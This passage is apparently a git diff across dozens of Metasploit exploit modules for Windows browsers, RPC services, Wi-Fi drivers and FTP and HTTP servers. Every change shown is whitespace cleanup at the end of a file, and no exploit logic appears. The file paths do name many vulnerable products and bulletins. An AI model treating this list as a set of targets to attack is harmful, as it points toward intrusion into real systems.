b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb index ba32a7e74f..a2725e8cf6 100644 --- a/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb +++ b/modules/exploits/windows/browser/ibmlotusdomino_dwa_uploadmodule.rb @@ -130,5 +130,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ie_createobject.rb b/modules/exploits/windows/browser/ie_createobject.rb index dd463e4fcf..5fde4802a7 100644 --- a/modules/exploits/windows/browser/ie_createobject.rb +++ b/modules/exploits/windows/browser/ie_createobject.rb @@ -230,6 +230,4 @@ function #{var_func_exploit}( ) { handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb index 6aa433cb2e..d64fc56e0b 100644 --- a/modules/exploits/windows/browser/ie_iscomponentinstalled.rb +++ b/modules/exploits/windows/browser/ie_iscomponentinstalled.rb @@ -99,6 +99,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/kazaa_altnet_heap.rb b/modules/exploits/windows/browser/kazaa_altnet_heap.rb index 738e085533..beec5b4df3 100644 --- a/modules/exploits/windows/browser/kazaa_altnet_heap.rb +++ b/modules/exploits/windows/browser/kazaa_altnet_heap.rb @@ -112,5 +112,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/logitechvideocall_start.rb b/modules/exploits/windows/browser/logitechvideocall_start.rb index c011c1fa92..4dae91d4c9 100644 --- a/modules/exploits/windows/browser/logitechvideocall_start.rb +++ b/modules/exploits/windows/browser/logitechvideocall_start.rb @@ -91,5 +91,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/lpviewer_url.rb b/modules/exploits/windows/browser/lpviewer_url.rb index 38d9fa366f..b22d93fb54 100644 --- a/modules/exploits/windows/browser/lpviewer_url.rb +++ b/modules/exploits/windows/browser/lpviewer_url.rb @@ -115,5 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb index c442a4204c..a8f5d80fd0 100644 --- a/modules/exploits/windows/browser/macrovision_downloadandexecute.rb +++ b/modules/exploits/windows/browser/macrovision_downloadandexecute.rb @@ -101,5 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/macrovision_unsafe.rb b/modules/exploits/windows/browser/macrovision_unsafe.rb index 89f301b6b5..7aac6135eb 100644 --- a/modules/exploits/windows/browser/macrovision_unsafe.rb +++ b/modules/exploits/windows/browser/macrovision_unsafe.rb @@ -87,5 +87,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb index b8d0b53eea..ff49105c94 100644 --- a/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb +++ b/modules/exploits/windows/browser/mcafee_mcsubmgr_vsprintf.rb @@ -117,6 +117,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb index 45af6ffc3a..c424af63a8 100644 --- a/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb +++ b/modules/exploits/windows/browser/mcafeevisualtrace_tracetarget.rb @@ -90,5 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/mirc_irc_url.rb b/modules/exploits/windows/browser/mirc_irc_url.rb index 169ce54731..a78048671d 100644 --- a/modules/exploits/windows/browser/mirc_irc_url.rb +++ b/modules/exploits/windows/browser/mirc_irc_url.rb @@ -77,5 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb index 16d5bce4a1..668141acc2 100644 --- a/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb +++ b/modules/exploits/windows/browser/ms03_020_ie_objecttype.rb @@ -107,6 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb index dde389ec9d..b3d88492f6 100644 --- a/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb +++ b/modules/exploits/windows/browser/ms06_001_wmf_setabortproc.rb @@ -193,6 +193,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms06_013_createtextrange.rb b/modules/exploits/windows/browser/ms06_013_createtextrange.rb index b5d292a64d..19cf521114 100644 --- a/modules/exploits/windows/browser/ms06_013_createtextrange.rb +++ b/modules/exploits/windows/browser/ms06_013_createtextrange.rb @@ -164,6 +164,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms06_055_vml_method.rb b/modules/exploits/windows/browser/ms06_055_vml_method.rb index f17d18a2eb..3947c3808a 100644 --- a/modules/exploits/windows/browser/ms06_055_vml_method.rb +++ b/modules/exploits/windows/browser/ms06_055_vml_method.rb @@ -132,6 +132,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb index 1049789d18..63695fe960 100644 --- a/modules/exploits/windows/browser/ms06_057_webview_setslice.rb +++ b/modules/exploits/windows/browser/ms06_057_webview_setslice.rb @@ -123,6 +123,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms06_067_keyframe.rb b/modules/exploits/windows/browser/ms06_067_keyframe.rb index d47dacae02..a65ed71791 100644 --- a/modules/exploits/windows/browser/ms06_067_keyframe.rb +++ b/modules/exploits/windows/browser/ms06_067_keyframe.rb @@ -107,6 +107,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms06_071_xml_core.rb b/modules/exploits/windows/browser/ms06_071_xml_core.rb index 14862f3221..d5095e0781 100644 --- a/modules/exploits/windows/browser/ms06_071_xml_core.rb +++ b/modules/exploits/windows/browser/ms06_071_xml_core.rb @@ -137,6 +137,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb index f039dfdd6c..ca21d107a9 100644 --- a/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb +++ b/modules/exploits/windows/browser/ms08_041_snapshotviewer.rb @@ -95,5 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb index d4c85d0004..55feae9350 100644 --- a/modules/exploits/windows/browser/ms08_053_mediaencoder.rb +++ b/modules/exploits/windows/browser/ms08_053_mediaencoder.rb @@ -112,5 +112,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/nis2004_get.rb b/modules/exploits/windows/browser/nis2004_get.rb index 8e16c6119d..c28f472bf7 100644 --- a/modules/exploits/windows/browser/nis2004_get.rb +++ b/modules/exploits/windows/browser/nis2004_get.rb @@ -86,5 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/novelliprint_executerequest.rb b/modules/exploits/windows/browser/novelliprint_executerequest.rb index a7e75daf3d..1f9525383c 100644 --- a/modules/exploits/windows/browser/novelliprint_executerequest.rb +++ b/modules/exploits/windows/browser/novelliprint_executerequest.rb @@ -115,5 +115,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb index 270232d54f..fcab9c441b 100644 --- a/modules/exploits/windows/browser/novelliprint_getdriversettings.rb +++ b/modules/exploits/windows/browser/novelliprint_getdriversettings.rb @@ -114,5 +114,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/realplayer_console.rb b/modules/exploits/windows/browser/realplayer_console.rb index 1691e13d35..a55f5cdcd5 100644 --- a/modules/exploits/windows/browser/realplayer_console.rb +++ b/modules/exploits/windows/browser/realplayer_console.rb @@ -120,5 +120,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/realplayer_import.rb b/modules/exploits/windows/browser/realplayer_import.rb index 5fdec6c9c0..fc7fecbe7b 100644 --- a/modules/exploits/windows/browser/realplayer_import.rb +++ b/modules/exploits/windows/browser/realplayer_import.rb @@ -103,5 +103,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/realplayer_smil.rb b/modules/exploits/windows/browser/realplayer_smil.rb index 847101b4f7..c948bffe5d 100644 --- a/modules/exploits/windows/browser/realplayer_smil.rb +++ b/modules/exploits/windows/browser/realplayer_smil.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/softartisans_getdrivename.rb b/modules/exploits/windows/browser/softartisans_getdrivename.rb index e997ce43f8..1b1fe60f7c 100644 --- a/modules/exploits/windows/browser/softartisans_getdrivename.rb +++ b/modules/exploits/windows/browser/softartisans_getdrivename.rb @@ -116,5 +116,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb index f31a5afc33..ac9e98e3e0 100644 --- a/modules/exploits/windows/browser/sonicwall_addrouteentry.rb +++ b/modules/exploits/windows/browser/sonicwall_addrouteentry.rb @@ -92,5 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb index c97924a619..dec9d020bf 100644 --- a/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb +++ b/modules/exploits/windows/browser/symantec_backupexec_pvcalendar.rb @@ -125,5 +125,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb index cb74a6b710..c41a00006e 100644 --- a/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb +++ b/modules/exploits/windows/browser/systemrequirementslab_unsafe.rb @@ -86,4 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index d11070b6de..690b5f63ea 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -92,5 +92,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index cddf9b2ddf..1739d8a0be 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -90,6 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index 47541388b5..b3801b2a9a 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -146,5 +146,4 @@ class Metasploit3 < Msf::Exploit::Remote return songs end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index 594b0844ff..c3dec412da 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -154,4 +154,4 @@ itunes_album_id> a>.Z.......\./!. !.UP.......B...& Z....D)ydB.,.vy/ -=end +=end \ No newline at end of file diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index 729c336946..15f5adb7a2 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index db5377deb5..ad01416989 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 7346a71251..004770e158 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -93,5 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index e041a21786..62d507e991 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -88,5 +88,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(cli) end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index 4b6a773ed7..5bb53f0ad5 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -89,4 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote end -end +end \ No newline at end of file diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index d50418f79b..237f6c4ca0 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -222,7 +222,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - - +end \ No newline at end of file diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 245f8ad216..668abbe5ec 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -155,5 +155,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index a2714869f9..f4e56a485b 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -151,5 +151,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/dcerpc/msdns_zonename.rb b/modules/exploits/windows/dcerpc/msdns_zonename.rb index cdcab0b129..1f552714f9 100644 --- a/modules/exploits/windows/dcerpc/msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/msdns_zonename.rb @@ -290,5 +290,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb index 3b8c680104..dccc77a6de 100644 --- a/modules/exploits/windows/driver/broadcom_wifi_ssid.rb +++ b/modules/exploits/windows/driver/broadcom_wifi_ssid.rb @@ -205,5 +205,4 @@ class Metasploit3 < Msf::Exploit::Remote payload.encoded end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/driver/dlink_wifi_rates.rb b/modules/exploits/windows/driver/dlink_wifi_rates.rb index c3088afe19..3fbaf9685f 100644 --- a/modules/exploits/windows/driver/dlink_wifi_rates.rb +++ b/modules/exploits/windows/driver/dlink_wifi_rates.rb @@ -201,5 +201,4 @@ class Metasploit3 < Msf::Exploit::Remote return frame end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/driver/netgear_wg111_beacon.rb b/modules/exploits/windows/driver/netgear_wg111_beacon.rb index b290aa0918..05268a0c27 100644 --- a/modules/exploits/windows/driver/netgear_wg111_beacon.rb +++ b/modules/exploits/windows/driver/netgear_wg111_beacon.rb @@ -218,5 +218,4 @@ class Metasploit3 < Msf::Exploit::Remote return frame end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/email/ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ani_loadimage_chunksize.rb index 8cd4ddd228..76e9bb0461 100644 --- a/modules/exploits/windows/email/ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ani_loadimage_chunksize.rb @@ -349,6 +349,4 @@ class Metasploit3 < Msf::Exploit::Remote rand_text_alphanumeric(rand(128)+4) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index d6db1354b2..fbac3d35f4 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -81,5 +81,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/firewall/blackice_pam_icq.rb b/modules/exploits/windows/firewall/blackice_pam_icq.rb index ab27db4247..2f480d9181 100644 --- a/modules/exploits/windows/firewall/blackice_pam_icq.rb +++ b/modules/exploits/windows/firewall/blackice_pam_icq.rb @@ -140,5 +140,4 @@ class Metasploit3 < Msf::Exploit::Remote } end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/firewall/kerio_auth.rb b/modules/exploits/windows/firewall/kerio_auth.rb index 2dc650056b..e4980be592 100644 --- a/modules/exploits/windows/firewall/kerio_auth.rb +++ b/modules/exploits/windows/firewall/kerio_auth.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb index 43a8d0d636..3b9362eb82 100644 --- a/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb +++ b/modules/exploits/windows/ftp/3cdaemon_ftp_user.rb @@ -111,6 +111,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/cesarftp_mkd.rb b/modules/exploits/windows/ftp/cesarftp_mkd.rb index 36d98acb29..c9a3ea3ea3 100644 --- a/modules/exploits/windows/ftp/cesarftp_mkd.rb +++ b/modules/exploits/windows/ftp/cesarftp_mkd.rb @@ -79,5 +79,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/dreamftp_format.rb b/modules/exploits/windows/ftp/dreamftp_format.rb index cf6f7b1a00..5253e13e7a 100644 --- a/modules/exploits/windows/ftp/dreamftp_format.rb +++ b/modules/exploits/windows/ftp/dreamftp_format.rb @@ -83,5 +83,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/easyfilesharing_pass.rb b/modules/exploits/windows/ftp/easyfilesharing_pass.rb index 3142d39128..60cf278a04 100644 --- a/modules/exploits/windows/ftp/easyfilesharing_pass.rb +++ b/modules/exploits/windows/ftp/easyfilesharing_pass.rb @@ -82,5 +82,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/filecopa_list_overflow.rb b/modules/exploits/windows/ftp/filecopa_list_overflow.rb index 1674340898..9a3def4beb 100644 --- a/modules/exploits/windows/ftp/filecopa_list_overflow.rb +++ b/modules/exploits/windows/ftp/filecopa_list_overflow.rb @@ -54,5 +54,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/freeftpd_key_exchange.rb b/modules/exploits/windows/ftp/freeftpd_key_exchange.rb index 7b7b354c6a..1b91a01825 100644 --- a/modules/exploits/windows/ftp/freeftpd_key_exchange.rb +++ b/modules/exploits/windows/ftp/freeftpd_key_exchange.rb @@ -84,5 +84,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/freeftpd_user.rb b/modules/exploits/windows/ftp/freeftpd_user.rb index 2a5fdb0c09..cee4931b7b 100644 --- a/modules/exploits/windows/ftp/freeftpd_user.rb +++ b/modules/exploits/windows/ftp/freeftpd_user.rb @@ -101,5 +101,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/globalscapeftp_input.rb b/modules/exploits/windows/ftp/globalscapeftp_input.rb index 425501ccaf..634eab7ce3 100644 --- a/modules/exploits/windows/ftp/globalscapeftp_input.rb +++ b/modules/exploits/windows/ftp/globalscapeftp_input.rb @@ -73,5 +73,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb index 625b2287e1..7e6e71153b 100644 --- a/modules/exploits/windows/ftp/leapftp_pasv_reply.rb +++ b/modules/exploits/windows/ftp/leapftp_pasv_reply.rb @@ -122,6 +122,4 @@ class Metasploit3 < Msf::Exploit::Remote handler(client) service.close_client(client) end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/netterm_netftpd_user.rb b/modules/exploits/windows/ftp/netterm_netftpd_user.rb index bff4f7e8f4..2d57bf9b39 100644 --- a/modules/exploits/windows/ftp/netterm_netftpd_user.rb +++ b/modules/exploits/windows/ftp/netterm_netftpd_user.rb @@ -118,5 +118,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb index 88f7d5653f..a8b6f72fc7 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_pass.rb @@ -95,5 +95,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb index 9120f32b39..c4904f3512 100644 --- a/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb +++ b/modules/exploits/windows/ftp/oracle9i_xdb_ftp_unlock.rb @@ -100,5 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/sami_ftpd_user.rb b/modules/exploits/windows/ftp/sami_ftpd_user.rb index 5dd61b71f2..1834af53c6 100644 --- a/modules/exploits/windows/ftp/sami_ftpd_user.rb +++ b/modules/exploits/windows/ftp/sami_ftpd_user.rb @@ -100,5 +100,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/sasser_ftpd_port.rb b/modules/exploits/windows/ftp/sasser_ftpd_port.rb index e562632d8f..087eb1483c 100644 --- a/modules/exploits/windows/ftp/sasser_ftpd_port.rb +++ b/modules/exploits/windows/ftp/sasser_ftpd_port.rb @@ -71,5 +71,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/servu_mdtm.rb b/modules/exploits/windows/ftp/servu_mdtm.rb index 9e86b10939..697a466b61 100644 --- a/modules/exploits/windows/ftp/servu_mdtm.rb +++ b/modules/exploits/windows/ftp/servu_mdtm.rb @@ -198,5 +198,4 @@ class Metasploit3 < Msf::Exploit::Remote return (res and res =~ /^500/) ? true : false end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/slimftpd_list_concat.rb b/modules/exploits/windows/ftp/slimftpd_list_concat.rb index 86c189a678..57e43c06d0 100644 --- a/modules/exploits/windows/ftp/slimftpd_list_concat.rb +++ b/modules/exploits/windows/ftp/slimftpd_list_concat.rb @@ -77,5 +77,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/warftpd_165_pass.rb b/modules/exploits/windows/ftp/warftpd_165_pass.rb index 6b3184f2bd..1bc079e68b 100644 --- a/modules/exploits/windows/ftp/warftpd_165_pass.rb +++ b/modules/exploits/windows/ftp/warftpd_165_pass.rb @@ -86,6 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/warftpd_165_user.rb b/modules/exploits/windows/ftp/warftpd_165_user.rb index 4ac412eb37..2639411a3f 100644 --- a/modules/exploits/windows/ftp/warftpd_165_user.rb +++ b/modules/exploits/windows/ftp/warftpd_165_user.rb @@ -90,6 +90,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/wftpd_size.rb b/modules/exploits/windows/ftp/wftpd_size.rb index d41d108999..a79d887a47 100644 --- a/modules/exploits/windows/ftp/wftpd_size.rb +++ b/modules/exploits/windows/ftp/wftpd_size.rb @@ -69,5 +69,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb index 13e8f334f8..239dd061eb 100644 --- a/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb +++ b/modules/exploits/windows/ftp/wsftp_server_503_mkd.rb @@ -86,5 +86,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb index 2609da0486..f9a8a11a64 100644 --- a/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb +++ b/modules/exploits/windows/ftp/wsftp_server_505_xmd5.rb @@ -75,5 +75,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/games/mohaa_getinfo.rb b/modules/exploits/windows/games/mohaa_getinfo.rb index 7f530f578c..dcba6a3f4f 100644 --- a/modules/exploits/windows/games/mohaa_getinfo.rb +++ b/modules/exploits/windows/games/mohaa_getinfo.rb @@ -93,4 +93,4 @@ class Metasploit3 < Msf::Exploit::Remote disconnect_udp end -end +end \ No newline at end of file diff --git a/modules/exploits/windows/games/ut2004_secure.rb b/modules/exploits/windows/games/ut2004_secure.rb index 0f3b397719..9ed54b18e7 100644 --- a/modules/exploits/windows/games/ut2004_secure.rb +++ b/modules/exploits/windows/games/ut2004_secure.rb @@ -119,5 +119,4 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Safe end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/altn_webadmin.rb b/modules/exploits/windows/http/altn_webadmin.rb index 69378e4bd3..2db91e7332 100644 --- a/modules/exploits/windows/http/altn_webadmin.rb +++ b/modules/exploits/windows/http/altn_webadmin.rb @@ -113,5 +113,4 @@ class Metasploit3 < Msf::Exploit::Remote handler end -end - +end \ No newline at end of file diff --git a/modules/exploits/windows/http/apache_chunked.rb b/modules/exploits/windows/http/apache_chunked.rb index c7b79b7b83..36d2dac40d 100644 --- a/modules/exploits/windows/http/apache_chunked.rb +++ b/modules/exploits/windows/http/apache_chunked.rb @@ -255,5 +255,4 @@ class 